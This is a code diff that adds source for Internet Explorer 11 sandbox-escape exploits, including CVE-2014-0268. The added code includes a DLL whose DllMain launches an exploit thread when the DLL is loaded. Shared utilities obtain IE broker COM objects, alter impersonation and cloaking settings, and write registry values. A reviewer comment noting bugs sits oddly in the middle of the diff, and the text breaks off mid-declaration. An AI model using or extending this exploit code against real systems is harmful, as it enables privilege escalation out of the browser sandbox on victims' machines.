<PlatformToolset>v120</PlatformToolset> + 
<WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + 
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="CVE-2014-0268.cpp" /> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + 
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj"> + <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project> + </ProjectReference> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp new file mode 100755 index 0000000000..042cf2c7c4 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp 
@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+ DWORD ul_reason_for_call,
+ LPVOID lpReserved
+ )
+{
+ switch (ul_reason_for_call)
+ {
+ case DLL_PROCESS_ATTACH:
+ CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+ break;
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ case DLL_PROCESS_DETACH:
+ break;
+ }
+ return TRUE;
+}
+
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp
new file mode 100755
index 0000000000..11763c77a3
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h
new file mode 100755
index 0000000000..562cb0adb0
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h
@@ -0,0 +1,11 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj b/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj
new file mode 100755
index 0000000000..2e2b9ea000
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj
@@ -0,0 +1,154 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>CommandUtils</RootNamespace> + <ProjectName>CommonUtils</ProjectName> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + 
<WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup /> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + 
<WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + 
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="regln.h" /> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + <ClInclude Include="Utils.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="regln.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + <ClCompile Include="Utils.cpp" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp new file mode 100755 index 0000000000..dbc6eeeb92 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp 
@@ -0,0 +1,373 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" + +#include "Utils.h" + +#include <strsafe.h> +#include <sddl.h> +#include <Shlwapi.h> + +#pragma comment(lib, "shlwapi.lib") + +static BOOL g_hasShDocIID; +static IID g_shDocIID; + +BOOL GetIIDForName(LPCWSTR lpName, IID* riid) +{ + HKEY hRoot = nullptr; + ULONG status; + + status = RegOpenKeyEx(HKEY_CLASSES_ROOT, L"Interface", 0, KEY_ENUMERATE_SUB_KEYS, &hRoot); + if (status == 0) + { + WCHAR keyName[128]; + DWORD index = 0; + BOOL foundKey = FALSE; + + while (true) + { + HKEY hSubKey; + + status = RegEnumKeyW(hRoot, index, keyName, _countof(keyName)); + if (status != 0) + { + break; + } + + index++; + + status = RegOpenKeyEx(hRoot, keyName, 0, KEY_QUERY_VALUE, &hSubKey); + if (status != 0) + { + continue; + } + + DWORD dwType; + WCHAR valueName[256]; + DWORD dwSize = sizeof(valueName)-sizeof(WCHAR); + + status = RegQueryValueEx(hSubKey, nullptr, nullptr, &dwType, (BYTE*)valueName, &dwSize); + RegCloseKey(hSubKey); + + if ((status != 0) || (dwType != REG_SZ)) + { + continue; + } + + // Ensure NUL terminate + valueName[dwSize / sizeof(WCHAR)] = 0; + + if (_wcsicmp(valueName, lpName) == 0) + { + foundKey = TRUE; + break; + } + } + + RegCloseKey(hRoot); + + if (foundKey) + { + return SUCCEEDED(IIDFromString(keyName, 
riid)); + } + } + else + { + DebugPrintf("Could not open Interface key %d\n", status); + } + + return FALSE; +} + +REFIID GetSHDocIID() +{ + if (!g_hasShDocIID) + { + memset(&g_shDocIID, 0, sizeof(g_shDocIID)); + + g_hasShDocIID; + + GetIIDForName(L"ISHDocVwBroker", &g_shDocIID); + } + + return g_shDocIID; +} + +bstr_t GetTemp(LPCWSTR name) +{ + WCHAR tempPath[MAX_PATH]; + + GetTempPath(MAX_PATH, tempPath); + + PathAppend(tempPath, name); + + return tempPath; +} + +bstr_t GetTempPath() +{ + WCHAR tempPath[MAX_PATH]; + + GetTempPath(MAX_PATH, tempPath); + + return tempPath; +} + +bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len) +{ + WCHAR tempPath[MAX_PATH]; + + GetTempPath(MAX_PATH, tempPath); + + PathAppend(tempPath, name); + + FILE* fp = nullptr; + + if (_wfopen_s(&fp, tempPath, L"wb") == 0) + { + fwrite(buf, 1, len, fp); + + fclose(fp); + + return tempPath; + } + else + { + return L""; + } +} + +std::vector<unsigned char> ReadFileToMem(LPCWSTR name) +{ + FILE* fp; + std::vector<unsigned char> ret; + + if (_wfopen_s(&fp, name, L"rb") == 0) + { + fseek(fp, 0, SEEK_END); + + ret.resize(ftell(fp)); + fseek(fp, 0, SEEK_SET); + + fread(&ret[0], 1, ret.size(), fp); + + fclose(fp); + } + + return ret; +} + +void DebugPrintf(LPCSTR lpFormat, ...) 
+{ +#ifdef _DEBUG + CHAR buf[1024]; + va_list va; + + va_start(va, lpFormat); + + StringCbVPrintfA(buf, sizeof(buf), lpFormat, va); + + OutputDebugStringA(buf); +#endif +} + +bstr_t GetUserSid() +{ + HANDLE hToken = nullptr; + PTOKEN_USER pUser = nullptr; + LPWSTR userName = nullptr; + bstr_t ret; + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) + { + DebugPrintf("Error opening process token: %d", GetLastError()); + goto error; + } + + //TOKEN_USER user = { 0 }; + DWORD retLength = 0; + + if (!GetTokenInformation(hToken, TokenUser, nullptr, 0, &retLength)) + { + if (GetLastError() != ERROR_INSUFFICIENT_BUFFER) + { + DebugPrintf("Error getting token information size: %d", GetLastError()); + goto error; + } + } + + pUser = (PTOKEN_USER) new char[retLength]; + + if (!GetTokenInformation(hToken, TokenUser, pUser, retLength, &retLength)) + { + DebugPrintf("Error getting token information: %d", GetLastError()); + goto error; + } + + if (!ConvertSidToStringSidW(pUser->User.Sid, &userName)) + { + DebugPrintf("Error converting Sid to String: %d", GetLastError()); + goto error; + } + + ret = userName; + +error: + + if (hToken) + { + CloseHandle(hToken); + } + + if (pUser) + { + delete[] pUser; + } + + if (userName) + { + LocalFree(userName); + } + + return ret; +} + +typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker); + +GUID CLSID_CShdocvwBroker = { 0x9C7A1728, +0x0B694, 0x427A, { 0x94, 0xA2, 0xA1, 0xB2, 0xC6, 0x0F, 0x03, 0x60 } }; + +void DisableImpersonation(IUnknown* pUnk) +{ + IClientSecurity* sec = nullptr; + + HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec)); + if (SUCCEEDED(hr)) + { + hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_ANONYMOUS, nullptr, EOAC_NONE); + DebugPrintf("SetBlanket: %08X", hr); + sec->Release(); + } + else + { + DebugPrintf("Error getting client security: %08X", hr); + } +} + +void SetCloaking(IUnknown* pUnk) +{ + 
IClientSecurity* sec = nullptr; + + HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec)); + if (SUCCEEDED(hr)) + { + hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT, + RPC_C_IMP_LEVEL_IDENTIFY, nullptr, EOAC_DYNAMIC_CLOAKING); + DebugPrintf("SetBlanket: %08X", hr); + sec->Release(); + } + else + { + DebugPrintf("Error getting client security: %08X", hr); + } +} + +IIEUserBrokerPtr CreateBroker() +{ + HMODULE hMod = LoadLibrary(L"iertutil.dll"); + + fCoCreateUserBroker pfCoCreateUserBroker = (fCoCreateUserBroker)GetProcAddress(hMod, (LPCSTR)58); + + if (pfCoCreateUserBroker) + { + IIEUserBrokerPtr broker; + + HRESULT ret = pfCoCreateUserBroker(&broker); + + DebugPrintf("CreateBroker: %08X - %p", ret, broker); + + return broker; + } + + return nullptr; +} + +IShdocvwBroker* CreateSHDocVw() +{ + IIEUserBrokerPtr broker = CreateBroker(); + + if (broker != nullptr) + { + HRESULT ret; + IShdocvwBroker* shdocvw; + ret = broker->BrokerCreateKnownObject(CLSID_CShdocvwBroker, GetSHDocIID(), (IUnknown**)&shdocvw); + DebugPrintf("IShdocvwBroker: %08X %p", ret, shdocvw); + + if (SUCCEEDED(ret)) + { + return shdocvw; + } + } + + return nullptr; +} + +bstr_t GetWindowsSystemDirectory() +{ + WCHAR buf[MAX_PATH]; + + GetSystemDirectory(buf, MAX_PATH); + + return buf; +} + +bstr_t GetExecutableFileName(HMODULE hModule) +{ + WCHAR buf[MAX_PATH]; + + ::GetModuleFileNameW(hModule, buf, MAX_PATH); + + return buf; +} + +bstr_t GetSessionPath() +{ + std::wstringstream ss; + + WCHAR objPath[MAX_PATH + 1] = { 0 }; + ULONG length = MAX_PATH; + DWORD dwSessionId; + + if (ProcessIdToSessionId(GetCurrentProcessId(), &dwSessionId)) + { + ss << L"\\Sessions\\" << dwSessionId; + + return ss.str().c_str(); + } + + return L""; +} + +LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString) +{ + return RegSetValueEx(hKey, lpName, 0, REG_SZ, (const BYTE*)lpString, (wcslen(lpString) + 1) * sizeof(WCHAR)); +} + +LSTATUS 
CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d) +{ + return RegSetValueEx(hKey, lpName, 0, REG_DWORD, (const BYTE*)&d, sizeof(d)); +} \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h new file mode 100755 index 0000000000..db2c100fc8 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h @@ -0,0 +1,21 @@ +#include "interfaces.h" + +#include <vector> + +bstr_t GetTemp(LPCWSTR name); +bstr_t GetTempPath(); +bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len); +std::vector<unsigned char> ReadFileToMem(LPCWSTR name); +void DebugPrintf(LPCSTR lpFormat, ...); +bstr_t GetUserSid(); +void DisableImpersonation(IUnknown* pUnk); +void SetCloaking(IUnknown* pUnk); +IIEUserBrokerPtr CreateBroker(); +IShdocvwBroker* CreateSHDocVw(); +bstr_t GetWindowsSystemDirectory(); +bstr_t GetExecutableFileName(HMODULE hModule); +extern "C" int DeleteLink(LPCWSTR par_src); +extern "C" int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile); +bstr_t GetSessionPath(); +LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString); +LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d); \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h new file mode 100755 index 0000000000..c210b8ed2e --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h 
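Review bot: In `GetSHDocIID` (Utils.cpp hunk) the statement `g_hasShDocIID;` is an expression with no effect, so the flag stays FALSE and every call clears `g_shDocIID` and enumerates the `Interface` key again through `GetIIDForName`; it presumably should read `g_hasShDocIID = TRUE;`. In the same hunk `DebugPrintf` calls `va_start` without a matching `va_end(va);` after `StringCbVPrintfA`. `ReadFileToMem` leaves `fp` uninitialised, does not check `ftell` for -1 before `resize`, and evaluates `&ret[0]` on an empty vector when the file has zero length; a guard such as `if (!ret.empty()) fread(ret.data(), 1, ret.size(), fp);` covers the last case. `CreateBroker` passes the result of `LoadLibrary` to `GetProcAddress` without checking it for NULL.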
@@ -0,0 +1,258 @@ +#pragma once + +#include <tchar.h> +#include <Windows.h> +#include <comdef.h> +#include <Shtypes.h> +#include <DocObj.h> + +struct __declspec(uuid("1AC7516E-E6BB-4A69-B63F-E841904DC5A6")) IIEUserBroker : IUnknown +{ + virtual HRESULT STDMETHODCALLTYPE Initialize(HWND *, LPCWSTR, LPDWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE CreateProcessW(DWORD pid, LPWSTR appName, LPWSTR cmdline, DWORD, DWORD, LPCSTR, WORD*, /* _BROKER_STARTUPINFOW*/ void *, /* _BROKER_PROCESS_INFORMATION */ void*) = 0; + virtual HRESULT STDMETHODCALLTYPE WinExec(DWORD pid, LPCSTR, DWORD, DWORD*) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerCreateKnownObject(_GUID const &, _GUID const &, IUnknown * *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstance() = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstanceEx(DWORD pid, _GUID const &, IUnknown *, DWORD, _COSERVERINFO *, DWORD, /* tagBROKER_MULTI_QI */ void *) = 0; + virtual HRESULT 